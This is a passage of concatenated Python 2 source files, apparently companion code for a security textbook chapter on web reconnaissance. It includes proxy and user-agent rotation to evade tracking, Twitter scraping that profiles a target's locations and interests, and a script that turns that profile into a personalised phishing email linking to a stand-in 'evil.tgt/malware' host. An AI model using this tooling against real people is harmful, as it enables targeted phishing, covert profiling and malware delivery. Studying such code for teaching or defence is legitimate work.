338 | 344 | 345 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/test.py.svn-base: -------------------------------------------------------------------------------- 1 | import mechanize 2 | from BeautifulSoup import BeautifulSoup 3 | 4 | b = mechanize.Browser() 5 | response = b.open('http://www.espn.com').read() 6 | 7 | soup = BeautifulSoup(''.join(response)) 8 | 9 | allTags = soup.findAll(True) 10 | print [tag.name for tag in allTags] 11 | -------------------------------------------------------------------------------- /CH6/.svn/text-base/twitter.py.svn-base: -------------------------------------------------------------------------------- 1 | import violent_browser, urllib, re 2 | 3 | def query_twitter(query): 4 | #Urlencode 5 | query = urllib.quote_plus(query) 6 | results = [] 7 | browser = violent_browser.Violent_Browser() 8 | 9 | response = browser.open('http://search.twitter.com/search.json?q=' + query).read() 10 | 11 | #Get the results out of the string returned from twitter 12 | all_results = re.compile('"results"\:\[(.*?)\]').findall(response)[0] 13 | #Split the long string into individual results 14 | for result in all_results.split('},{'): 15 | print result 16 | try: 17 | #Grab 3 important fields 18 | new_result = {} 19 | new_result['from_user'] = re.compile('"from_user_name"\:(.*?),').findall(result)[0] 20 | new_result['geo'] = re.compile('"geo"\:(.*?),').findall(result)[0] 21 | new_result['tweet'] = re.compile('"text"\:"(.*?)",').findall(result)[0] 22 | results.append(new_result) 23 | except: 24 | pass 25 | return results 26 | 27 | print query_twitter('from:ViolentPython since:2010-01-01') -------------------------------------------------------------------------------- /CH6/.svn/text-base/twitter.pyc.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/twitter.pyc.svn-base -------------------------------------------------------------------------------- /CH6/.svn/text-base/twitter_interests.py.svn-base: -------------------------------------------------------------------------------- 1 | import twitter, re, urllib2 2 | 3 | def find_interests(results): 4 | interests = {} 5 | 6 | interests['links'] = [] 7 | interests['users'] = [] 8 | interests['hashtags'] = [] 9 | 10 | for result in results: 11 | tweet = result['tweet'] 12 | #Returns a tuple containing matches for these two regexes 13 | #RE on the left matches links at the very end of the tweet 14 | #RE on the right matches links not at the end 15 | links = re.compile('(http.*?)\Z|(http.*?) ').findall(tweet) 16 | 17 | for link in links: 18 | #If the first part matched 19 | if link[0]: link = link[0] 20 | #If the second part matched 21 | elif link[1]: link = link[1] 22 | #No part matched, go back to the top 23 | else: continue 24 | 25 | response = urllib2.urlopen(link) 26 | full_link = response.url 27 | interests['links'].append(full_link) 28 | 29 | #\w matches a letter, number, or _ 30 | interests['users'] += re.compile('(@\w+)').findall(tweet) 31 | interests['hashtags'] += re.compile('(#\w+)').findall(tweet) 32 | return interests 33 | 34 | results = twitter.query_twitter('from:ViolentPython') 35 | i = find_interests(results) 36 | print i['links'] -------------------------------------------------------------------------------- /CH6/.svn/text-base/twitter_locate.py.svn-base: -------------------------------------------------------------------------------- 1 | import urllib, web_common, urlparse, os, re 2 | 3 | def locate(tweet, cities): 4 | tweet = tweet.lower() 5 | words_in_tweet = tweet.split(' ') 6 | for word in words_in_tweet: 7 | if word in cities: 8 | return word 9 | return 'unknown' 10 | 11 | def load_cities(file_name): 12 | cities = [] 13 | for line in open(file_name).readlines(): 14 | city = line.split(',')[3] 15 | city = city.replace('"', '').lower() 16 | cities.append(city) 17 | return cities 18 | 19 | cities = load_cities('/home/frosty/Desktop/GeoWorldMap/cities.txt') 20 | 21 | for result in query_twitter('from:ViolentPython since:2010-01-01'): 22 | if result['geo'] != 'null': 23 | print result['geo'] 24 | else: 25 | print locate(result['tweet'], cities) -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_browser.py.svn-base: -------------------------------------------------------------------------------- 1 | import mechanize, cookielib, random 2 | 3 | class Violent_Browser(mechanize.Browser): 4 | def __init__(self, proxies = [], user_agents = []): 5 | #Initialize the parent browser 6 | mechanize.Browser.__init__(self) 7 | self.set_handle_robots(False) 8 | 9 | self.proxies = proxies 10 | 11 | self.user_agents = user_agents + ['Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 12 | 'Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)', 13 | 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'] 14 | 15 | self.anonymize() 16 | 17 | def clear_cookies(self): 18 | cookie_jar = cookielib.LWPCookieJar() 19 | self.set_cookiejar(cookie_jar) 20 | 21 | def change_user_agent(self): 22 | index = random.randrange(0, len(self.user_agents) ) 23 | self.addheaders = [('User-agent', ( self.user_agents[index] ))] 24 | 25 | def change_proxy(self): 26 | if self.proxies: 27 | index = random.randrange(0, len(self.proxies)) 28 | browser_proxy( {'http': self.proxies[index]} ) 29 | 30 | def anonymize(self, sleep = False): 31 | self.clear_cookies() 32 | self.change_user_agent() 33 | self.change_proxy() 34 | 35 | if sleep: 36 | time.sleep(60) 37 | 38 | vb = Violent_Browser() 39 | 40 | response = vb.open('http://espn.com') -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_browser.pyc.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/violent_browser.pyc.svn-base -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_email.py.svn-base: -------------------------------------------------------------------------------- 1 | import smtplib 2 | 3 | class Email_Client(): 4 | def __init__(self, server_ip, server_port = 25): 5 | self.server_ip = server_ip 6 | self.server_port = 25 7 | self.server = smtplib.SMTP(self.server_ip, self.server_port) 8 | 9 | def send_email(self, to_addr, from_addr, subject, text): 10 | body_of_email = 'From: ' + from_addr + '\r\n' 11 | body_of_email += 'To: ' + to_addr + '\r\n' 12 | body_of_email += 'Subject: ' + subject + '\r\n' 13 | body_of_email += text 14 | 15 | self.server.sendmail(from_addr, [to_addr], body_of_email) 16 | 17 | client = Email_Client('173.255.204.159') 18 | client.send_email('frosty@unluckyfrosty.net', 'frosty@unluckyfrosty.net', 'Hi!', 'Hello') -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_email.pyc.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/violent_email.pyc.svn-base -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_person.py.svn-base: -------------------------------------------------------------------------------- 1 | import json, urllib, re, urllib2 2 | from violent_browser import Violent_Browser 3 | 4 | class Violent_Person(): 5 | def __init__(self, first_name, last_name, job = '', social_media = {} ): 6 | self.first_name = first_name 7 | self.last_name = last_name 8 | self.job = job 9 | self.social_media = social_media 10 | 11 | def __repr__(self): 12 | return self.first_name + ' ' + self.last_name + ' has job ' + self.job 13 | 14 | def get_social(self, media_name): 15 | if self.social_media.has_key(media_name): 16 | return self.social_media[media_name] 17 | 18 | return None 19 | 20 | def get_tweets(self, handle): 21 | #Urlencode 22 | query = urllib.quote_plus('from:' + handle + ' since:2009-01-01') 23 | tweets = [] 24 | browser = Violent_Browser() 25 | 26 | #Note, .read() is not called on the response 27 | response = browser.open('http://search.twitter.com/search.json?q=' + query) 28 | 29 | json_objects = json.load(response) 30 | print json_objects 31 | for result in json_objects['results']: 32 | new_result = {} 33 | new_result['from_user'] = result['from_user_name'] 34 | new_result['geo'] = result['geo'] 35 | new_result['tweet'] = result['text'] 36 | tweets.append(new_result) 37 | return tweets 38 | 39 | def twitter_locate(self, tweets): 40 | def load_cities(): 41 | cities = [] 42 | for line in open('/home/frosty/Desktop/GeoWorldMap/cities.txt').readlines(): 43 | city = line.split(',')[3] 44 | city = city.replace('"', '').lower() 45 | cities.append(city) 46 | return cities 47 | 48 | locations = [] 49 | cities = load_cities() 50 | 51 | for tweet in tweets: 52 | if tweet['geo'] != 'null': locations.append(tweet['geo']) 53 | else: 54 | text = tweet['tweet'].lower() 55 | for word in text.split(' '): 56 | #Tweet mentioned a specific city 57 | if word in cities: 58 | locations.append(word) 59 | return locations 60 | 61 | def find_interests(self, tweets): 62 | interests = {} 63 | 64 | interests['links'] = [] 65 | interests['users'] = [] 66 | interests['hashtags'] = [] 67 | 68 | for tweet in tweets: 69 | text = tweet['tweet'] 70 | #Returns a tuple containing matches for these two regexes 71 | #RE on the left matches links at the very end of the tweet 72 | #RE on the right matches links not at the end 73 | links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) 74 | 75 | for link in links: 76 | #If the first part matched 77 | if link[0]: link = link[0] 78 | #If the second part matched 79 | elif link[1]: link = link[1] 80 | #No part matched, go back to the top 81 | else: continue 82 | 83 | response = urllib2.urlopen(link) 84 | #Get the full link, not the shortened url provided by twitter 85 | full_link = response.url 86 | interests['links'].append(full_link) 87 | 88 | #\w matches a letter, number, or _ 89 | interests['users'] += re.compile('(@\w+)').findall(text) 90 | interests['hashtags'] += re.compile('(#\w+)').findall(text) 91 | return interests 92 | 93 | def twitter(self): 94 | handle = self.get_social('Twitter') 95 | if not handle: return 'Error, no twitter handle known' 96 | 97 | tweets = self.get_tweets(handle) 98 | locations = self.twitter_locate(tweets) 99 | interests = self.find_interests(tweets) 100 | 101 | return {'tweets': tweets, 'locations' : locations, 'interests': interests} 102 | 103 | vp = Violent_Person('Violent', 'Python', social_media = {'Twitter': 'ViolentPython'}) 104 | vp.twitter() -------------------------------------------------------------------------------- /CH6/.svn/text-base/violent_person.pyc.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/violent_person.pyc.svn-base -------------------------------------------------------------------------------- /CH6/.svn/text-base/web_common.py.svn-base: -------------------------------------------------------------------------------- 1 | import mechanize, cookielib 2 | 3 | def anonymize(browser, user_agents, proxies = None): 4 | #If not using a proxy, do nothing 5 | if proxies: 6 | #Random number between 0 and the length of proxies 7 | index = random.randrange(0, len(proxies) ) 8 | #Set browser's proxy to the randomly chosen proxy 9 | browser.set_proxy( {'http': proxies[index]} ) 10 | 11 | #Randomly choose a new user agent string 12 | index = random.randrange(0, len(user_agents)) 13 | browser.addheaders = user_agents[index] 14 | 15 | #Clear cookies 16 | cj = cookielib.LWPCookieJar() 17 | browser.set_cookiejar(cj) 18 | 19 | time.sleep(60) 20 | return browser 21 | 22 | def create_browser(): 23 | #Create the basic browser object 24 | browser = mechanize.Browser() 25 | #Create a handler for cookies, this class can load and save cookies 26 | cj = cookielib.LWPCookieJar() 27 | #Add it to browser 28 | browser.set_cookiejar(cj) 29 | #Ignore robots.txt, so we don't miss anything while scraping 30 | browser.set_handle_robots(False) 31 | #Allow refresh redirections 32 | browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 33 | #Add a user agent header to our browser 34 | browser.addheaders = [('User-agent', ('Mozilla/5.0 (compatible; MSIE 9.0;' 35 | 'Windows NT 6.1; Trident/5.0)'))] 36 | return browser -------------------------------------------------------------------------------- /CH6/.svn/text-base/web_common.pyc.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.svn/text-base/web_common.pyc.svn-base -------------------------------------------------------------------------------- /CH6/1-viewPage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import mechanize 4 | 5 | 6 | def viewPage(url): 7 | browser = mechanize.Browser() 8 | page = browser.open(url) 9 | source_code = page.read() 10 | print source_code 11 | 12 | 13 | viewPage('http://www.syngress.com/') 14 | 15 | -------------------------------------------------------------------------------- /CH6/10-sendMail.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import smtplib 4 | from email.mime.text import MIMEText 5 | 6 | 7 | def sendMail(user,pwd,to,subject,text): 8 | 9 | msg = MIMEText(text) 10 | msg['From'] = user 11 | msg['To'] = to 12 | msg['Subject'] = subject 13 | 14 | try: 15 | smtpServer = smtplib.SMTP('smtp.gmail.com', 587) 16 | print "[+] Connecting To Mail Server." 17 | smtpServer.ehlo() 18 | print "[+] Starting Encrypted Session." 19 | smtpServer.starttls() 20 | smtpServer.ehlo() 21 | print "[+] Logging Into Mail Server." 22 | smtpServer.login(user, pwd) 23 | print "[+] Sending Mail." 24 | smtpServer.sendmail(user, to, msg.as_string()) 25 | smtpServer.close() 26 | print "[+] Mail Sent Successfully." 27 | 28 | except: 29 | print "[-] Sending Mail Failed." 30 | 31 | 32 | user = 'username' 33 | pwd = 'password' 34 | 35 | sendMail(user, pwd, 'target@tgt.tgt',\ 36 | 'Re: Important', 'Test Message') 37 | 38 | -------------------------------------------------------------------------------- /CH6/10-sendSpam.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import smtplib 4 | import optparse 5 | 6 | from email.mime.text import MIMEText 7 | from twitterClass import * 8 | from random import choice 9 | 10 | def sendMail(user,pwd,to,subject,text): 11 | 12 | msg = MIMEText(text) 13 | msg['From'] = user 14 | msg['To'] = to 15 | msg['Subject'] = subject 16 | 17 | try: 18 | smtpServer = smtplib.SMTP('smtp.gmail.com', 587) 19 | print "[+] Connecting To Mail Server." 20 | smtpServer.ehlo() 21 | print "[+] Starting Encrypted Session." 22 | smtpServer.starttls() 23 | smtpServer.ehlo() 24 | print "[+] Logging Into Mail Server." 25 | smtpServer.login(user, pwd) 26 | print "[+] Sending Mail." 27 | smtpServer.sendmail(user, to, msg.as_string()) 28 | smtpServer.close() 29 | print "[+] Mail Sent Successfully." 30 | 31 | except: 32 | print "[-] Sending Mail Failed." 33 | 34 | 35 | def main(): 36 | 37 | parser = optparse.OptionParser('usage %prog '+\ 38 | '-u -t '+\ 39 | '-l -p ') 40 | 41 | parser.add_option('-u', dest='handle', type='string',\ 42 | help='specify twitter handle') 43 | 44 | parser.add_option('-t', dest='tgt', type='string',\ 45 | help='specify target email') 46 | 47 | parser.add_option('-l', dest='user', type='string',\ 48 | help='specify gmail login') 49 | 50 | parser.add_option('-p', dest='pwd', type='string',\ 51 | help='specify gmail password') 52 | 53 | 54 | (options, args) = parser.parse_args() 55 | handle = options.handle 56 | tgt = options.tgt 57 | user = options.user 58 | pwd = options.pwd 59 | 60 | if handle == None or tgt == None\ 61 | or user ==None or pwd==None: 62 | print parser.usage 63 | exit(0) 64 | 65 | 66 | print "[+] Fetching tweets from: "+str(handle) 67 | spamTgt = reconPerson(handle) 68 | spamTgt.get_tweets() 69 | print "[+] Fetching interests from: "+str(handle) 70 | interests = spamTgt.find_interests() 71 | print "[+] Fetching location information from: "+\ 72 | str(handle) 73 | location = spamTgt.twitter_locate('mlb-cities.txt') 74 | 75 | 76 | spamMsg = "Dear "+tgt+"," 77 | 78 | if (location!=None): 79 | randLoc=choice(location) 80 | spamMsg += " Its me from "+randLoc+"." 81 | 82 | if (interests['users']!=None): 83 | randUser=choice(interests['users']) 84 | spamMsg += " "+randUser+" said to say hello." 85 | 86 | if (interests['hashtags']!=None): 87 | randHash=choice(interests['hashtags']) 88 | spamMsg += " Did you see all the fuss about "+\ 89 | randHash+"?" 90 | 91 | if (interests['links']!=None): 92 | randLink=choice(interests['links']) 93 | spamMsg += " I really liked your link to: "+\ 94 | randLink+"." 95 | 96 | spamMsg += " Check out my link to http://evil.tgt/malware" 97 | print "[+] Sending Msg: "+spamMsg 98 | 99 | sendMail(user, pwd, tgt, 'Re: Important', spamMsg) 100 | 101 | if __name__ == '__main__': 102 | main() 103 | 104 | -------------------------------------------------------------------------------- /CH6/2-proxyTest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import mechanize 4 | 5 | 6 | def testProxy(url, proxy): 7 | browser = mechanize.Browser() 8 | browser.set_proxies(proxy) 9 | page = browser.open(url) 10 | source_code = page.read() 11 | print source_code 12 | 13 | 14 | url = 'http://ip.nefsc.noaa.gov/' 15 | hideMeProxy = {'http': '216.155.139.115:3128'} 16 | 17 | testProxy(url, hideMeProxy) 18 | 19 | -------------------------------------------------------------------------------- /CH6/3-userAgentTest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import mechanize 4 | 5 | 6 | def testUserAgent(url, userAgent): 7 | browser = mechanize.Browser() 8 | browser.addheaders = userAgent 9 | page = browser.open(url) 10 | source_code = page.read() 11 | print source_code 12 | 13 | 14 | url = 'http://whatismyuseragent.dotdoh.com/' 15 | userAgent = [('User-agent', 'Mozilla/5.0 (X11; U; '+\ 16 | 'Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01')] 17 | testUserAgent(url, userAgent) 18 | 19 | -------------------------------------------------------------------------------- /CH6/4-printCookies.py: -------------------------------------------------------------------------------- 1 | import mechanize 2 | import cookielib 3 | 4 | def printCookies(url): 5 | browser = mechanize.Browser() 6 | cookie_jar = cookielib.LWPCookieJar() 7 | browser.set_cookiejar(cookie_jar) 8 | page = browser.open(url) 9 | for cookie in cookie_jar: 10 | print cookie 11 | 12 | url = 'http://www.syngress.com/' 13 | printCookies(url) 14 | -------------------------------------------------------------------------------- /CH6/5-kittenTest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from anonBrowser import * 4 | 5 | ab = anonBrowser(proxies=[],\ 6 | user_agents=[('User-agent','superSecretBroswer')]) 7 | 8 | for attempt in range(1, 5): 9 | ab.anonymize() 10 | print '[*] Fetching page' 11 | response = ab.open('http://kittenwar.com') 12 | for cookie in ab.cookie_jar: 13 | print cookie 14 | -------------------------------------------------------------------------------- /CH6/6-linkParser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from anonBrowser import * 5 | from BeautifulSoup import BeautifulSoup 6 | import os 7 | import optparse 8 | import re 9 | 10 | 11 | def printLinks(url): 12 | 13 | ab = anonBrowser() 14 | ab.anonymize() 15 | page = ab.open(url) 16 | html = page.read() 17 | 18 | try: 19 | print '[+] Printing Links From Regex.' 20 | link_finder = re.compile('href="(.*?)"') 21 | links = link_finder.findall(html) 22 | for link in links: 23 | print link 24 | except: 25 | pass 26 | 27 | try: 28 | print '\n[+] Printing Links From BeautifulSoup.' 29 | soup = BeautifulSoup(html) 30 | links = soup.findAll(name='a') 31 | for link in links: 32 | if link.has_key('href'): 33 | print link['href'] 34 | except: 35 | pass 36 | 37 | 38 | def main(): 39 | parser = optparse.OptionParser('usage %prog ' +\ 40 | '-u ') 41 | 42 | parser.add_option('-u', dest='tgtURL', type='string',\ 43 | help='specify target url') 44 | 45 | (options, args) = parser.parse_args() 46 | url = options.tgtURL 47 | 48 | if url == None: 49 | print parser.usage 50 | exit(0) 51 | else: 52 | printLinks(url) 53 | 54 | 55 | if __name__ == '__main__': 56 | main() 57 | 58 | -------------------------------------------------------------------------------- /CH6/7-imageMirror.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from anonBrowser import * 5 | from BeautifulSoup import BeautifulSoup 6 | import os 7 | import optparse 8 | 9 | 10 | def mirrorImages(url, dir): 11 | ab = anonBrowser() 12 | ab.anonymize() 13 | html = ab.open(url) 14 | soup = BeautifulSoup(html) 15 | image_tags = soup.findAll('img') 16 | 17 | for image in image_tags: 18 | filename = image['src'].lstrip('http://') 19 | filename = os.path.join(dir,\ 20 | filename.replace('/', '_')) 21 | print '[+] Saving ' + str(filename) 22 | data = ab.open(image['src']).read() 23 | ab.back() 24 | save = open(filename, 'wb') 25 | save.write(data) 26 | save.close() 27 | 28 | 29 | def main(): 30 | parser = optparse.OptionParser('usage %prog '+\ 31 | '-u -d ') 32 | 33 | parser.add_option('-u', dest='tgtURL', type='string',\ 34 | help='specify target url') 35 | parser.add_option('-d', dest='dir', type='string',\ 36 | help='specify destination directory') 37 | 38 | (options, args) = parser.parse_args() 39 | 40 | url = options.tgtURL 41 | dir = options.dir 42 | 43 | if url == None or dir == None: 44 | print parser.usage 45 | exit(0) 46 | 47 | else: 48 | try: 49 | mirrorImages(url, dir) 50 | except Exception, e: 51 | print '[-] Error Mirroring Images.' 52 | print '[-] ' + str(e) 53 | 54 | 55 | if __name__ == '__main__': 56 | main() 57 | 58 | -------------------------------------------------------------------------------- /CH6/8-anonGoogle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import json 4 | import urllib 5 | import optparse 6 | from anonBrowser import * 7 | 8 | 9 | class Google_Result: 10 | 11 | def __init__(self,title,text,url): 12 | self.title = title 13 | self.text = text 14 | self.url = url 15 | 16 | def __repr__(self): 17 | return self.title 18 | 19 | 20 | def google(search_term): 21 | ab = anonBrowser() 22 | 23 | search_term = urllib.quote_plus(search_term) 24 | response = ab.open('http://ajax.googleapis.com/'+\ 25 | 'ajax/services/search/web?v=1.0&q='+ search_term) 26 | objects = json.load(response) 27 | results = [] 28 | 29 | for result in objects['responseData']['results']: 30 | url = result['url'] 31 | title = result['titleNoFormatting'] 32 | text = result['content'] 33 | new_gr = Google_Result(title, text, url) 34 | results.append(new_gr) 35 | return results 36 | 37 | 38 | def main(): 39 | parser = optparse.OptionParser('usage %prog ' +\ 40 | '-k ') 41 | parser.add_option('-k', dest='keyword', type='string',\ 42 | help='specify google keyword') 43 | (options, args) = parser.parse_args() 44 | keyword = options.keyword 45 | 46 | if options.keyword == None: 47 | print parser.usage 48 | exit(0) 49 | else: 50 | results = google(keyword) 51 | print results 52 | 53 | 54 | if __name__ == '__main__': 55 | main() 56 | 57 | -------------------------------------------------------------------------------- /CH6/8-googleJson.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import json 4 | import urllib 5 | from anonBrowser import * 6 | 7 | 8 | def google(search_term): 9 | ab = anonBrowser() 10 | 11 | search_term = urllib.quote_plus(search_term) 12 | response = ab.open('http://ajax.googleapis.com/'+\ 13 | 'ajax/services/search/web?v=1.0&q='+ search_term) 14 | objects = json.load(response) 15 | 16 | print objects 17 | 18 | 19 | google('Boondock Saint') 20 | 21 | -------------------------------------------------------------------------------- /CH6/8-googleJumbled.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import urllib 4 | from anonBrowser import * 5 | 6 | 7 | def google(search_term): 8 | ab = anonBrowser() 9 | 10 | search_term = urllib.quote_plus(search_term) 11 | response = ab.open('http://ajax.googleapis.com/'+\ 12 | 'ajax/services/search/web?v=1.0&q='+ search_term) 13 | print response.read() 14 | 15 | google('Boondock Saint') 16 | 17 | -------------------------------------------------------------------------------- /CH6/9-twitterClass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import urllib 4 | from anonBrowser import * 5 | import json 6 | import re 7 | import urllib2 8 | 9 | 10 | class reconPerson: 11 | 12 | def __init__(self, handle): 13 | self.handle = handle 14 | self.tweets = self.get_tweets() 15 | 16 | def get_tweets(self): 17 | query = urllib.quote_plus('from:' + self.handle+\ 18 | ' since:2009-01-01 include:retweets' 19 | ) 20 | tweets = [] 21 | browser = anonBrowser() 22 | browser.anonymize() 23 | response = browser.open('http://search.twitter.com/'+\ 24 | 'search.json?q=' + query) 25 | 26 | json_objects = json.load(response) 27 | for result in json_objects['results']: 28 | new_result = {} 29 | new_result['from_user'] = result['from_user_name'] 30 | new_result['geo'] = result['geo'] 31 | new_result['tweet'] = result['text'] 32 | tweets.append(new_result) 33 | return tweets 34 | 35 | def find_interests(self): 36 | interests = {} 37 | interests['links'] = [] 38 | interests['users'] = [] 39 | interests['hashtags'] = [] 40 | 41 | for tweet in self.tweets: 42 | text = tweet['tweet'] 43 | links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) 44 | 45 | for link in links: 46 | if link[0]: 47 | link = link[0] 48 | elif link[1]: 49 | link = link[1] 50 | else: 51 | continue 52 | 53 | try: 54 | response = urllib2.urlopen(link) 55 | full_link = response.url 56 | interests['links'].append(full_link) 57 | except: 58 | pass 59 | interests['users'] +=\ 60 | re.compile('(@\w+)').findall(text) 61 | interests['hashtags'] +=\ 62 | re.compile('(#\w+)').findall(text) 63 | 64 | interests['users'].sort() 65 | interests['hashtags'].sort() 66 | interests['links'].sort() 67 | return interests 68 | 69 | def twitter_locate(self, cityFile): 70 | cities = [] 71 | if cityFile != None: 72 | for line in open(cityFile).readlines(): 73 | city = line.strip('\n').strip('\r').lower() 74 | cities.append(city) 75 | 76 | locations = [] 77 | locCnt = 0 78 | cityCnt = 0 79 | tweetsText = '' 80 | 81 | for tweet in self.tweets: 82 | if tweet['geo'] != None: 83 | locations.append(tweet['geo']) 84 | locCnt += 1 85 | 86 | tweetsText += tweet['tweet'].lower() 87 | 88 | for city in cities: 89 | if city in tweetsText: 90 | locations.append(city) 91 | cityCnt += 1 92 | 93 | return locations 94 | 95 | 96 | -------------------------------------------------------------------------------- /CH6/9-twitterGeo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import json 4 | import urllib 5 | import optparse 6 | from anonBrowser import * 7 | 8 | def get_tweets(handle): 9 | query = urllib.quote_plus('from:' + handle+\ 10 | ' since:2009-01-01 include:retweets') 11 | tweets = [] 12 | browser = anonBrowser() 13 | browser.anonymize() 14 | 15 | response = browser.open('http://search.twitter.com/'+\ 16 | 'search.json?q='+ query) 17 | 18 | json_objects = json.load(response) 19 | for result in json_objects['results']: 20 | new_result = {} 21 | new_result['from_user'] = result['from_user_name'] 22 | new_result['geo'] = result['geo'] 23 | new_result['tweet'] = result['text'] 24 | tweets.append(new_result) 25 | 26 | return tweets 27 | 28 | 29 | def load_cities(cityFile): 30 | cities = [] 31 | for line in open(cityFile).readlines(): 32 | city=line.strip('\n').strip('\r').lower() 33 | cities.append(city) 34 | return cities 35 | 36 | def twitter_locate(tweets,cities): 37 | locations = [] 38 | locCnt = 0 39 | cityCnt = 0 40 | tweetsText = "" 41 | 42 | for tweet in tweets: 43 | if tweet['geo'] != None: 44 | locations.append(tweet['geo']) 45 | locCnt += 1 46 | 47 | tweetsText += tweet['tweet'].lower() 48 | 49 | for city in cities: 50 | if city in tweetsText: 51 | locations.append(city) 52 | cityCnt+=1 53 | 54 | print "[+] Found "+str(locCnt)+" locations "+\ 55 | "via Twitter API and "+str(cityCnt)+\ 56 | " locations from text search." 57 | return locations 58 | 59 | 60 | def main(): 61 | 62 | parser = optparse.OptionParser('usage %prog '+\ 63 | '-u [-c ]') 64 | 65 | parser.add_option('-u', dest='handle', type='string',\ 66 | help='specify twitter handle') 67 | parser.add_option('-c', dest='cityFile', type='string',\ 68 | help='specify file containing cities to search') 69 | 70 | (options, args) = parser.parse_args() 71 | handle = options.handle 72 | cityFile = options.cityFile 73 | 74 | if (handle==None): 75 | print parser.usage 76 | exit(0) 77 | 78 | cities = [] 79 | if (cityFile!=None): 80 | cities = load_cities(cityFile) 81 | tweets = get_tweets(handle) 82 | locations = twitter_locate(tweets,cities) 83 | print "[+] Locations: "+str(locations) 84 | 85 | if __name__ == '__main__': 86 | main() 87 | 88 | 89 | -------------------------------------------------------------------------------- /CH6/9-twitterInterests.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import json 5 | import re 6 | import urllib 7 | import urllib2 8 | import optparse 9 | from anonBrowser import * 10 | 11 | 12 | def get_tweets(handle): 13 | query = urllib.quote_plus('from:' + handle+\ 14 | ' since:2009-01-01 include:retweets') 15 | tweets = [] 16 | browser = anonBrowser() 17 | browser.anonymize() 18 | 19 | response = browser.open('http://search.twitter.com/'+\ 20 | 'search.json?q=' + query) 21 | 22 | json_objects = json.load(response) 23 | for result in json_objects['results']: 24 | new_result = {} 25 | new_result['from_user'] = result['from_user_name'] 26 | new_result['geo'] = result['geo'] 27 | new_result['tweet'] = result['text'] 28 | tweets.append(new_result) 29 | return tweets 30 | 31 | 32 | def find_interests(tweets): 33 | interests = {} 34 | interests['links'] = [] 35 | interests['users'] = [] 36 | interests['hashtags'] = [] 37 | 38 | for tweet in tweets: 39 | text = tweet['tweet'] 40 | links = re.compile('(http.*?)\Z|(http.*?) ')\ 41 | .findall(text) 42 | 43 | for link in links: 44 | if link[0]: 45 | link = link[0] 46 | elif link[1]: 47 | link = link[1] 48 | else: 49 | continue 50 | 51 | try: 52 | response = urllib2.urlopen(link) 53 | full_link = response.url 54 | interests['links'].append(full_link) 55 | except: 56 | pass 57 | interests['users'] += re.compile('(@\w+)').findall(text) 58 | interests['hashtags'] +=\ 59 | re.compile('(#\w+)').findall(text) 60 | 61 | interests['users'].sort() 62 | interests['hashtags'].sort() 63 | interests['links'].sort() 64 | 65 | return interests 66 | 67 | 68 | def main(): 69 | 70 | parser = optparse.OptionParser('usage %prog '+\ 71 | '-u ') 72 | 73 | parser.add_option('-u', dest='handle', type='string',\ 74 | help='specify twitter handle') 75 | 76 | (options, args) = parser.parse_args() 77 | handle = options.handle 78 | if handle == None: 79 | print parser.usage 80 | exit(0) 81 | 82 | tweets = get_tweets(handle) 83 | interests = find_interests(tweets) 84 | print '\n[+] Links.' 85 | for link in set(interests['links']): 86 | print ' [+] ' + str(link) 87 | 88 | print '\n[+] Users.' 89 | for user in set(interests['users']): 90 | print ' [+] ' + str(user) 91 | 92 | print '\n[+] 